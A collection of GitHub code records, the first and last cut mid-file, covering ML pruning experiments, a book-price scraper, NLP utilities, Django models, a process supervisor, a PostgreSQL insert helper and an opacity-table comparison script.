wrapper_intra_fusion(model=model, model_name=args.model_name, resnet=False, sparsity=sparsity, prune_iter_steps=total_steps, num_epochs=train_epochs, loaders=loaders, prune_type=PruneType.L2, meta_prune_type=MetaPruneType.IF, gpu_id=0)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print(\"fused: \", accuracy_fused_g)\n fused_model_g, epoch_accuracies = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=100, gpu_id =0, prune=False, performed_epochs=0)\n print(\"Final fused is: \", epoch_accuracies[-1])\n result[f\"model_{idx}\"][sparsity] = epoch_accuracies\n \n with open(\"results_intrafusion_resnet18_dataaware_prune_L2_05.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n\n\n exit()\n \"\"\"sparsities = [0.5, 0.6, 0.7, 0.8]\n result = {}\n for idx, model in enumerate(models):\n result[f\"model_{idx}\"] = {}\n for sparsity in sparsities:\n fused_model_g = model\n iterations = []\n if sparsity > 0.5:\n if sparsity == 0.6:\n iterations = [0.2, 0.4]\n if sparsity == 0.7 or sparsity == 0.8:\n iterations = [0.2, 0.4, 0.6]\n for i in iterations:\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=i, fusion_type=\"weight\", full_model = model, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=10, gpu_id =0, prune=False, performed_epochs=0)\n\n fused_model_g = intrafusion_bn(fused_model_g, sparsity=sparsity, fusion_type=\"weight\", full_model = model, gpu_id = args.gpu_id, resnet = True, train_loader=get_cifar_data_loader(shuffle=True)[\"train\"])\n #fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=140, gpu_id =0, prune=False, performed_epochs=0)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n\n #print('Test Accuracy of the model fused beginning weight: %.2f' % accuracy_fused_w)\n\n fused_model_g, epoch_accuracies = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=150-10*len(iterations), gpu_id =0, prune=False, performed_epochs=0)\n\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n result[f\"model_{idx}\"][str(sparsity)] = epoch_accuracies\n\n with open(\"results_intrafusion.json\", \"w\") as outfile:\n json.dump(result, outfile, indent=4)\n exit()\"\"\"\n #fused_model_w, _ = train_during_pruning(fused_model_w, loaders=loaders, num_epochs=40, gpu_id =0, prune=False, performed_epochs=0)\n fused_model_g, _ = train_during_pruning(fused_model_g, loaders=loaders, num_epochs=40, gpu_id =0, prune=False, performed_epochs=0)\n\n #accuracy_fused_w = evaluate_performance_simple(fused_model_w, loaders, 0, eval=True)\n accuracy_fused_g = evaluate_performance_simple(fused_model_g, loaders, 0, eval=True)\n\n #print('Test Accuracy of the model fused beginning weight: %.2f' % accuracy_fused_w)\n print('Test Accuracy of the model fused beginning gradient: %.2f' % accuracy_fused_g)\n \"\"\"fused_accs = []\n for idx in range(40):\n fused_model, _ = train_during_pruning(fused_model, loaders=loaders, num_epochs=1, gpu_id =0, prune=False, performed_epochs=0)\n fused_accs.append(evaluate_performance_simple(fused_model, loaders, 0, eval=True))\n\n\n accuracy_fused = evaluate_performance_simple(fused_model, loaders, 0, eval=True)\n print('Test Accuracy of the model fused after: %.2f' % accuracy_fused)\n print(fused_accs)\"\"\"\n\n\n\n\n \n\n\n\n\n\n\n \n\n\n","repo_name":"olinmg/DL_Project_LTH_Fusing","sub_path":"fusion_pruning_experiments/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"44924297033","text":"'''\nSIMPLE WEBSCRAPPER TO SCRAPE THE PRICE OF ALL BOOKS ON SAID URL And writes them/saves to a cvs file to be viwed in a spreadsheet.\nSIMPLY CHANGE THE ELEMENTS AND VARIABLES TO REVERSE ENGINEER THIS TO WORK AS YOU SEE FIT.\n'''\nfrom flask import Flask, render_template, request, requests\nfrom bs4 import BeautifulSoup\nfrom csv import writer\n\n# Desired website:\nresponse = requests.get('http://books.toscrape.com/')\n\n# Declare Beautiful Soup Parser:\nsoup = BeautifulSoup(response.text, 'html.parser')\n\n#Declare Prices variavle:\nprices = soup.find_all(class_=\"product_price\") # find all classes with the name product_price\n\n# Save Data to CVS file:\nwith open('NameOfFile.csv', 'w') as csv_file:\n csv_writer = writer(csv_file)\n # headers = ['Title', 'Price']\n headers = [\"header1\", \"header2\"]\n csv_writer.writerow(headers)\n\n # loop through prices content and pinpick desired section/content, then save to CVS file\n for price in prices:\n myPrice = price.get_text().replace('\\n', '')[:7]\n csv_writer.writerow([myPrice]) # writes a row of each data into cvs file","repo_name":"EsC369/Python_Web_Scrapper","sub_path":"pythonWebScrapper.py","file_name":"pythonWebScrapper.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73837738923","text":"from teanaps import configure as con\n#from teanaps.nlp import NamedEntityRecognizer\n#from konlpy.tag import Kkma\nfrom kss import split_sentences\n \nimport re\nimport time\n#from pykospacing import spacing\n\nclass Processing(): \n def __init__(self):\n self.stopword_path = con.STOPWORD_PATH\n self.stopword_org_path = con.STOPWORD_ORG_PATH\n self.cnoun_path = con.CNOUN_PATH\n self.cnoun_org_path = con.CNOUN_ORG_PATH\n self.synonym_path = con.SYNONYM_PATH\n self.synonym_org_path = con.SYNONYM_ORG_PATH\n #self.kkma = Kkma()\n \n def get_synonym(self): \n synonym_list = open(con.SYNONYM_PATH, encoding=\"utf-8\").read().strip().split(\"\\n\")\n synonym_dict = {}\n for synonym in synonym_list:\n for i, word in enumerate(synonym.split(\"\\t\")):\n if i == 0:\n representative_word = word\n synonym_dict[representative_word] = synonym.split(\"\\t\")\n return synonym_dict\n \n def add_synonym(self, add_dict={}):\n synonym_dict = self.get_synonym()\n for representative_word, synonym_list in add_dict.items():\n if representative_word in synonym_dict.keys():\n for synonym in synonym_list:\n if synonym not in synonym_dict[representative_word]:\n synonym_dict[representative_word].append(synonym)\n else:\n synonym_dict[representative_word] = []\n for synonym in synonym_list:\n if synonym not in synonym_dict[representative_word]:\n synonym_dict[representative_word].append(synonym)\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n for representative_word, synonym_list in synonym_dict.items():\n synonym_line = \"\"\n if representative_word not in synonym_list:\n f.write(representative_word + \"\\t\")\n for synonym in synonym_list:\n synonym_line += synonym + \"\\t\"\n f.write(synonym_line.strip() + \"\\n\")\n f.close()\n \n def remove_synonym(self, remove_list=[]):\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n synonym_dict = self.get_synonym()\n for synonym in remove_list:\n if synonym in synonym_dict.keys():\n del synonym_dict[synonym]\n else:\n for representative_word, synonym_list in synonym_dict.items():\n if synonym in synonym_list:\n synonym_list.remove(synonym)\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n for representative_word, synonym_list in synonym_dict.items():\n synonym_line = \"\"\n if representative_word not in synonym_list:\n f.write(representative_word + \"\\t\")\n for synonym in synonym_list:\n synonym_line += synonym + \"\\t\"\n f.write(synonym_line.strip() + \"\\n\")\n f.close()\n \n def clear_synonym(self):\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_synonym(self):\n f = open(self.synonym_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.synonym_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_synonym(self, synonym):\n synonym_dict = self.get_synonym()\n if synonym in synonym_dict.keys():\n return True\n for representative_word, synonym_list in synonym_dict.items():\n if representative_word == synonym or synonym in synonym_list:\n return True\n return False\n \n def get_cnoun(self):\n cnoun_list = []\n f = open(self.cnoun_path, encoding=\"utf-8\")\n for line in f:\n cnoun_list.append(line.strip())\n f.close()\n return cnoun_list\n \n def add_cnoun(self, add_list=[]):\n cnoun_list = self.get_cnoun()\n f = open(self.cnoun_path, \"a\", encoding=\"utf-8\")\n if type(add_list) == type(\"\"):\n add_list = [add_list]\n for cnoun in add_list:\n if cnoun not in cnoun_list:\n f.write(cnoun + \"\\n\")\n f.close()\n \n def remove_cnoun(self, remove_list=[]):\n cnoun_list = self.get_cnoun()\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n for cnoun in cnoun_list:\n if cnoun not in remove_list:\n f.write(cnoun + \"\\n\")\n f.close()\n \n def clear_cnoun(self):\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_cnoun(self):\n f = open(self.cnoun_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.cnoun_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_cnoun(self, cnoun):\n cnoun_list = self.get_cnoun()\n if cnoun in cnoun_list:\n return True\n else:\n return False\n \n def get_stopword(self):\n stopword_list = []\n f = open(self.stopword_path, encoding=\"utf-8\")\n for line in f:\n stopword_list.append(line.strip())\n f.close()\n return stopword_list\n \n def add_stopword(self, add_list=[]):\n stopword_list = self.get_stopword()\n f = open(self.stopword_path, \"a\", encoding=\"utf-8\")\n if type(add_list) == type(\"\"):\n add_list = [add_list]\n for stopword in add_list:\n if stopword not in stopword_list:\n f.write(stopword + \"\\n\")\n f.close()\n \n def remove_stopword(self, remove_list=[]):\n stopword_list = self.get_stopword()\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n if type(remove_list) == type(\"\"):\n remove_list = [remove_list]\n for stopword in stopword_list:\n if stopword not in remove_list:\n f.write(stopword + \"\\n\")\n f.close()\n \n def clear_stopword(self):\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n f.close()\n \n def set_org_stopword(self):\n f = open(self.stopword_path, \"w\", encoding=\"utf-8\")\n f_org = open(self.stopword_org_path, encoding=\"utf-8\")\n for line in f_org:\n f.write(line)\n f_org.close()\n f.close()\n \n def is_stopword(self, stopword):\n stopword_list = self.get_stopword()\n if stopword in stopword_list:\n return True\n else:\n return False\n \n def start_timer(self):\n self.start = time.time()\n self.lab = []\n \n def lab_timer(self):\n self.lab.append((len(self.lab)+1, round(time.time() - self.start, 4)))\n return self.lab\n \n '''\n def get_spacing(self, sentence):\n if len(sentence) < 195:\n sentence = spacing(sentence)\n return sentence\n '''\n \n def get_token_position(self, sentence_org, tag_list):\n content_ = sentence_org\n position = 0\n loc_list = []\n for word, pos in tag_list:\n loc = content_.find(word)\n if loc != -1:\n position += loc\n content_ = content_[loc:]\n start = position\n end = position + len(word)\n org_word = sentence_org[start:end]\n else:\n start = 0\n end = 0\n org_word = word\n loc_list.append((org_word, pos, (start, end)))\n return loc_list\n \n def language_detector(self, sentence):\n len_ko = len(re.sub(\"[^가-힇]\", \"\", sentence))\n len_en = len(re.sub(\"[^a-zA-Z]\", \"\", sentence))\n return \"ko\" if len_ko >= len_en else \"en\"\n\n def iteration_remover(self, sentence, replace_char=\".\"):\n pattern_list = [r'(.)\\1{5,}', r'(..)\\1{5,}', r'(...)\\1{5,}']\n for pattern in pattern_list:\n matcher= re.compile(pattern)\n iteration_term_list = [match.group() for match in matcher.finditer(sentence)]\n for iteration_term in iteration_term_list:\n sentence = sentence.replace(iteration_term, \n iteration_term[:pattern.count(\".\")] + replace_char*(len(iteration_term)-pattern.count(\".\")))\n return sentence\n \n def get_plain_text(self, sentence, pos_list=[], word_index=0, pos_index=1, tag_index=1, tag=True):\n plain_text_sentence = \"\"\n for token in sentence:\n if len(pos_list) > 0:\n if token[pos_index] in pos_list:\n plain_text_sentence += token[word_index].replace(\" \", \"\")\n if tag:\n plain_text_sentence += \"/\" + token[tag_index] + \" \"\n else:\n plain_text_sentence += \" \"\n else:\n plain_text_sentence += token[word_index].replace(\" \", \"\")\n if tag:\n plain_text_sentence += \"/\" + token[tag_index] + \" \"\n else:\n plain_text_sentence += \" \"\n return plain_text_sentence.strip()\n \n def replacer(self, sentence):\n patterns = [\n (r'won\\'t', 'will not'),\n (r'can\\'t', 'cannot'),\n (r'i\\'m', 'i am'),\n (r'ain\\'t', 'is not'),\n (r'(\\w+)\\'ll', '\\g<1> will'),\n (r'(\\w+)n\\'t', '\\g<1> not'),\n (r'(\\w+)\\'ve', '\\g<1> have'),\n (r'(\\w+)\\'s', '\\g<1> is'),\n (r'(\\w+)\\'re', '\\g<1> are'),\n (r'(\\w+)\\'d', '\\g<1> would'),\n ]\n self.patterns = [(re.compile(regex), repl) for (regex, repl) in patterns]\n for (pattern, repl) in self.patterns:\n sentence = re.sub(pattern, repl, sentence)\n return sentence\n \n '''\n def masking(self, sentence, replace_char=\"*\", replace_char_pattern = \"\", ner_tag_list=[], model_path=\"\"):\n if model_path == \"\":\n ner = NamedEntityRecognizer()\n else:\n ner = NamedEntityRecognizer(model_path=model_path)\n ner_result = ner.parse(sentence)\n for word, ner_tag, loc in ner_result:\n if len(ner_tag_list) == 0 or ner_tag in ner_tag_list:\n if replace_char_pattern != \"\":\n masked_word = \"\"\n for w, r in zip(word, replace_char_pattern):\n if w == r or r == \"_\":\n masked_word += w\n elif r == replace_char:\n masked_word += r\n else:\n masked_word += w\n if len(word) > len(replace_char_pattern):\n masked_word += replace_char*len(word[len(replace_char_pattern):])\n sentence = sentence[:loc[0]] + masked_word + sentence[loc[1]:]\n else:\n sentence = sentence[:loc[0]] + replace_char*len(word) + sentence[loc[1]:]\n \n return sentence\n '''\n\n def sentence_splitter(self, paragraph):\n #sentence_list = self.kkma.sentences(paragraph)\n sentence_list = split_sentences(paragraph)\n return sentence_list\n \n","repo_name":"fingeredman/teanaps","sub_path":"nlp/Processing.py","file_name":"Processing.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"19"}
+{"seq_id":"33192152382","text":"class Point:\n\t'Represents a point in two-dimensional geometric coordinates'\n\tdef __init__(self, x=1, y=3):\n\t\t'''Initilies the position of...'''\n\t\tself.move(x, y)\n\tdef move(self, x, y):\n\t\t\"Move the point to a new location in 2D space.\"\n\t\tself.x = x\n\t\tself.y = y\n\tdef reset(self):\n\t\t\"\"\"Resets the points to 0,0\"\"\"\n\t\tself.move(0, 0)\np = Point(3,1)\nagain = True\nwhile(again):\n\tprint(p.x, p.y)\n\tp.move(p.x+1, p.y-3)\n\tif p.x > 100:\n\t\tagain = False\na = raw_input(\"Press Return Key To Exit...\")\n","repo_name":"brandann/GarbageCode","sub_path":"PYTHON/Examples/first_class.py","file_name":"first_class.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"43146580849","text":"from transformers.models.wav2vec2.modeling_wav2vec2 import Wav2Vec2PreTrainedModel, Wav2Vec2Model\nimport torch\nimport torch.nn as nn\n\n# Wav2vec model skeleton\nclass Wav2vec2SER(Wav2Vec2PreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n self.config = config\n self.feat_extractor = Wav2Vec2Model(config)\n \n self.cls_layer = nn.Sequential(*[\n nn.Dropout(config.final_dropout),\n nn.Linear(config.hidden_size, config.hidden_size),\n nn.Tanh(),\n nn.Dropout(config.final_dropout),\n nn.Linear(config.hidden_size, config.num_labels)\n ]) \n self.init_weights()\n\n def forward(self, x):\n backbone_out = self.feat_extractor(x)\n logits = self.cls_layer(torch.mean(backbone_out[0], dim=1))\n return logits","repo_name":"adithya-tp/Low-Resource-SER-Experiments","sub_path":"models/wav2vec2.py","file_name":"wav2vec2.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"14430074886","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# veri kumesini oku\nverikumesi = pd.read_csv(\"ds1.txt\",delimiter=\"\\t\")\n\nX = verikumesi.iloc[:,:-1].values\ny = verikumesi.iloc[:,1].values\n\n# veri kumesini egitim ve test olarak parcala\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\n# dogrusal regresyon modeli\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# tahmin\ny_pred = regressor.predict(X_test)\n\n# veri gorsellestirme\nplt.scatter(X_train, y_train, color='red')\nplt.plot(X_test, y_pred, color='blue')\nplt.show()","repo_name":"ocatak-zz/ocatak.github.io","sub_path":"SIB552/01/src/linear_reg.py","file_name":"linear_reg.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"70392388524","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\n\n\nUser = get_user_model()\nTEXT_LIMIT = 15 # Ограничение количтсве символов\n\n\nclass Group(models.Model):\n title = models.CharField('Имя группы', max_length=200)\n slug = models.SlugField(unique=True)\n description = models.TextField('Описание')\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Группа'\n verbose_name_plural = 'Группы'\n\n\nclass Post(models.Model):\n text = models.TextField(\n 'Текст поста',\n help_text='Введите текст поста',\n )\n pub_date = models.DateTimeField(\n 'Дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='posts',\n verbose_name='Автор',\n )\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n related_name='posts',\n blank=True,\n null=True,\n verbose_name='Группа',\n help_text='Группа, к которой будет относиться пост',\n )\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True,\n help_text='Загрузите картинку',\n )\n\n def __str__(self):\n return self.text[:TEXT_LIMIT]\n\n class Meta:\n ordering = ['-pub_date']\n verbose_name = 'Сообщение'\n verbose_name_plural = 'Сообщения'\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(\n Post,\n on_delete=models.CASCADE,\n related_name='comments',\n verbose_name='Пост',\n help_text='Пост к которому оставлен комментарий',\n )\n author = models.ForeignKey(\n User,\n related_name='comments',\n verbose_name='Автор комментария',\n on_delete=models.CASCADE,\n )\n text = models.TextField(\n 'Комментарий',\n help_text='Напишите комментарий',\n )\n created = models.DateTimeField(\n 'Дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n\n def __str__(self):\n return self.text[:TEXT_LIMIT]\n\n class Meta:\n ordering = ['-created']\n verbose_name = 'Комментарий'\n verbose_name_plural = 'Комментарии'\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='Подписчик',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='Автор',\n related_name='following',\n )\n\n def __str__(self):\n return f'{self.user} подписался на {self.author}'\n\n class Meta:\n verbose_name = 'Подписка'\n verbose_name_plural = 'Подписки'\n constraints = [\n models.UniqueConstraint(\n fields=['user', 'author'],\n name='unique_follow',\n ),\n ]\n","repo_name":"iliya12321/Yatube","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"14713296983","text":"import os\nimport time\nimport signal\nimport psutil\nfrom logger import Logger\nfrom process.process import Process\n\n\nclass Master:\n\n def __init__(self, child_process):\n self.__stop = False\n self.process = []\n self.logger = Logger(Master.__name__, 'musicdaemon')\n\n self.child_process = child_process\n self.num_process = len(self.child_process)\n\n def main(self):\n master_pid = os.getpid()\n self.logger.log(\"start\", \"Start Master, PID {0}\".format(master_pid))\n\n signal.signal(signal.SIGINT, self.stop)\n signal.signal(signal.SIGTERM, self.stop)\n\n process_class_index = 0\n for child_process_id in range(self.num_process):\n pid = os.fork()\n child_process = self.child_process[process_class_index]\n process_name = child_process.name\n process_class = child_process.process_class\n\n if pid == 0:\n process = Process(child_process.name)\n exit_code = process.main(process_class)\n exit(exit_code)\n else:\n self.logger.log(\"start\",\n \"Start {0} Process {1} Process-{2} PID {3}\".format(\n process_class.__name__, process_name, child_process_id, pid\n ))\n self.process.append({\"id\": child_process_id, \"pid\": pid, \"name\": process_name})\n\n process_class_index += 1\n\n while not self.__stop:\n # os.system(\"ps aux | awk '{ print $8 \" \" $2 }' | grep -w Z\")\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid'])\n for p in self.process:\n if pinfo['pid'] == p['pid']:\n # print(p['name'], proc.status())\n if proc.status() == \"zombie\":\n proc.kill()\n self.process.pop(self.process.index(p))\n # else:\n # print(p['name'], proc.status())\n except psutil.NoSuchProcess:\n pass\n if len(self.process) == 1 and self.process[0]['name'] == 'server':\n self.stop(signal.SIGINT, 0)\n time.sleep(1)\n\n self.logger.log(\"stop\", \"Stop Master, PID {0}\".format(os.getpid()))\n\n def stop(self, signum, frame):\n self.__stop = True\n self.logger.log(\"stop\", \"Receive Signal {0}\".format(signum))\n\n for process in self.process:\n self.logger.log(\"stop\",\n \"Send Signal {0} to {1} Process-{2} PID {3}\".format(\n signal.SIGTERM, process['name'], process['id'], process['pid']\n ))\n os.kill(process['pid'], signal.SIGTERM)\n os.kill(process['pid'], signal.SIGKILL)\n","repo_name":"whiteblue3/apoweroftrance-radio-system","sub_path":"musicdaemon/process/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2703321160","text":"import psycopg2\n\n\ndef bullk_insert_img_file(records):\n try:\n connection = psycopg2.connect(user = \"postgres\",\n password = \"Yash@171\",\n host = \"localhost\",\n port = \"5432\",\n database = \"File Handling\")\n\n cursor = connection.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS metadata_of_image_file\")\n cursor.execute(\"\"\"CREATE TABLE metadata_of_image_file(id SERIAL PRIMARY KEY,\n image_name VARCHAR(255),\n hash_value VARCHAR(255),\n model VARCHAR(255), \n date_time VARCHAR(255), \n image_size VARCHAR(255))\"\"\")\n # cursor.execute(create_table_query)\n connection.commit()\n print(\"Table created successfully in PostgreSQL \")\n\n sql_insert_query =\"\"\"INSERT INTO metadata_of_image_file (image_name,hash_value, model, date_time, image_size) \n VALUES(%s, %s, %s, %s, %s)\"\"\"\n # executemany() to insert multiple rows\n result = cursor.executemany(sql_insert_query, records)\n connection.commit()\n print(cursor.rowcount, \"Record inserted successfully into metadata of image files table\")\n\n except(Exception, psycopg2.Error) as error:\n print(\"Failed inserting record into metadata of image file table {}\".format(error))\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error while creating PostgreSQL table\", error)\n finally:\n # closing database connection.\n if connection:\n cursor.close()\n connection.close()\n print(\"PostgreSQL connection is closed\")\n","repo_name":"YashKalbande/ai-files-managment-software","sub_path":"ImgDatabase.py","file_name":"ImgDatabase.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"74454974444","text":"import opacplot2 as opp\nimport argparse\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os.path\nimport periodictable as ptab\nimport scipy as sp\nplt.rcParams.update({'text.usetex': False})\n\ndef get_input_data():\n\n parser = argparse.ArgumentParser(\n description=\"This script is used to check error differences\"\n \"between two files.\")\n\n\n\n parser.add_argument('-v', '--verbose',\n action='store_const', const=True,\n help='Verbosity option.')\n\n\n parser.add_argument('input_1',\n action='store', type=str,\n help='Input file 1.')\n\n parser.add_argument('input_2',\n action='store', type=str,\n help='Input file 2.')\n\n parser.add_argument('-f', '--filetypes',\n action='store', type=str,\n help='Input filetypes.')\n\n parser.add_argument('--mpi_1',\n action='store', type=str,\n help='Mass per ion for file 1.')\n\n parser.add_argument('--mpi_2',\n action='store', type=str,\n help='Mass per ion for file 2.')\n\n parser.add_argument('--Znum_1',\n action='store', type=str,\n help='Atomic numbers for file 1.')\n\n parser.add_argument('--Znum_2',\n action='store', type=str,\n help='Atomic numbers for file 2.')\n\n parser.add_argument('--Xfracs_1',\n action='store', type=str,\n help='Number fractions for file 1.')\n\n parser.add_argument('--Xfracs_2',\n action='store', type=str,\n help='Number fractions for file 2.')\n\n parser.add_argument('--filters_1',\n action='store', type=str,\n help='dens, temp filter list '\n 'for SESAME for file 1 (g/cm^3, eV).')\n\n parser.add_argument('--filters_2',\n action='store', type=str,\n help='dens, temp filter list '\n 'for SESAME for file 2 (g/cm^3, eV).')\n\n parser.add_argument('-p','--plot',\n action='store_const',\n const=True, default=False)\n\n parser.add_argument('--writelog',\n action='store_const',\n const=True, default=False,\n help='Write error values to file.')\n\n parser.add_argument('--lin_grid',\n action='store_const',\n const=True, default=False,\n help='Linear values for interpolated grid.')\n\n parser.add_argument('--tabnum_1',\n action='store', type=str,\n help='Specify the SESAME table number for file 1.')\n\n parser.add_argument('--tabnum_2',\n action='store', type=str,\n help='Specify the SESAME table number for file 2.')\n\n args = parser.parse_args()\n\n # Get the relevant paths and filenames.\n path_in_1 = os.path.abspath(args.input_1)\n path_in_2 = os.path.abspath(args.input_2)\n\n basedir_1, fn_1 = os.path.split(path_in_1)\n basedir_2, fn_2 = os.path.split(path_in_2)\n\n # Split filename twice in case of MULTI files (.opr.gz, etc)\n basename_1 = os.path.splitext(os.path.splitext(fn_1)[0])[0]\n basename_2 = os.path.splitext(os.path.splitext(fn_2)[0])[0]\n\n # Create lists for filetypes.\n if args.filetypes is not None:\n args.filetypes = [typ for typ in args.filetypes.split(',')]\n\n if args.Znum_1 is not None:\n args.Znum_1 = [num for num in args.Znum_1.split(',')]\n if args.Znum_2 is not None:\n args.Znum_2 = [num for num in args.Znum_2.split(',')]\n\n # Convert mpis to float.\n if args.mpi_1 is not None:\n args.mpi_1 = float(args.mpi_1)\n if args.mpi_2 is not None:\n args.mpi_2 = float(args.mpi_2)\n\n # Convert xfracs to float list.\n if args.Xfracs_1 is not None:\n args.Xfracs_1 = [float(x) for x in args.Xfracs_1.split(',')]\n if args.Xfracs_2 is not None:\n args.Xfracs_2 = [float(x) for x in args.Xfracs_2.split(',')]\n\n # Set defaults for SESAME filters.\n if args.filters_1 is not None:\n args.filters_1 = [float(num) for num in args.filters_1.split(',')]\n else:\n args.filters_1 = [0., 0.,]\n if args.filters_2 is not None:\n args.filters_2 = [float(num) for num in args.filters_2.split(',')]\n else:\n args.filters_2 = [0., 0.,]\n\n # Convert tabnum into int.\n if args.tabnum_1 is not None:\n try:\n args.tabnum_1 = int(args.tabnum_1)\n except ValueError:\n raise ValueError('Please provide a valid '\n 'SESAME table number for file 1.')\n if args.tabnum_2 is not None:\n try:\n args.tabnum_2 = int(args.tabnum_2)\n except ValueError:\n raise ValueError('Please provide a valid '\n 'SESAME table number for file 2.')\n\n\n input_data = {'args':args,\n 'basename_1':basename_1,\n 'basename_2':basename_2,\n 'path_in_1':path_in_1,\n 'path_in_2':path_in_2,\n 'basedir_1':basedir_1,\n 'basedir_2':basedir_2,\n 'fn_1':fn_1,\n 'fn_2':fn_2}\n\n\n return input_data\n\ndef read_format_ext(args, f_1, f_2):\n # Try to read from the input file extension.\n ext_dict = {'.prp':'propaceos',\n '.eps':'multi',\n '.opp':'multi',\n '.opz':'multi',\n '.opr':'multi',\n '.mexport':'sesame-qeos',\n '.ses':'sesame',\n '.cn4':'ionmix'}\n\n # If the input file is compressed, choose the next extension.\n if os.path.splitext(f_1)[1] == '.gz':\n _, ext_1 = os.path.splitext(os.path.splitext(f_1)[0])\n else:\n _, ext_1 = os.path.splitext(f_1)\n\n if os.path.splitext(f_2)[1] == '.gz':\n _, ext_2 = os.path.splitext(os.path.splitext(f_2)[0])\n else:\n _, ext_2 = os.path.splitext(f_2)\n\n # Choose the correct input type based on extension and set args.input\n # accordingly.\n args.filetypes = []\n if ext_1 in ext_dict.keys():\n args.filetypes = args.filetypes + [ext_dict[ext_1]]\n else:\n raise Warning('Cannot tell filetype from extension {}. Please specify '\n 'input file type with --input.'.format(ext_1))\n if ext_2 in ext_dict.keys():\n args.filetypes = args.filetypes + [ext_dict[ext_2]]\n else:\n raise Warning('Cannot tell filetype from extension {}. Please specify '\n 'input file type with --input.'.format(ext_2))\n\nclass Formats_Read(object):\n \"\"\"\n Reads in a file and returns an object with useful attributes based on the\n corresponding opacplot2 object. This class also includes the naming\n conventions for each format.\n\n\n This procedure is preferred (although it is rather redundant with the\n rest of opacplot2) since it preserves the original structure of the\n opacplot2 object & all calculations & processing is done in this class\n alone. This way, the mechanisms are more transparent for error checking.\n\n\n Returns\n -------\n Formats_Read\n Formats_Read().data is the opacplot2 object corresponding to the input\n file.\n\n Formats_Read().ft is the filetype of the input file.\n\n Formats_Read().common_keys are the \"common dictionary style\" keys for\n opacplot2.\n \"\"\"\n\n # Names dictionaries.\n # Convert \"common dictionary style\" keys -> Format keys\n propaceos_names_dict = {'idens' : 'nion',\n 'temp' : 'temp',\n 'dens' : 'dens',\n 'Zf_DT' : 'zbar',\n 'Ut_DT' : 'eint',\n 'Uec_DT' : 'eele',\n 'Ui_DT' : 'eion',\n 'Pi_DT' : 'pion',\n 'Pec_DT' : 'pele',\n 'opp_mg' : 'opp_mg',\n 'opr_mg' : 'opr_mg',\n 'emp_mg' : 'emp_mg',\n 'opp_int' : 'opp_int',\n 'opr_int' : 'opr_int',\n 'emp_int' : 'emp_int',\n 'Znum' : 'Znum',\n 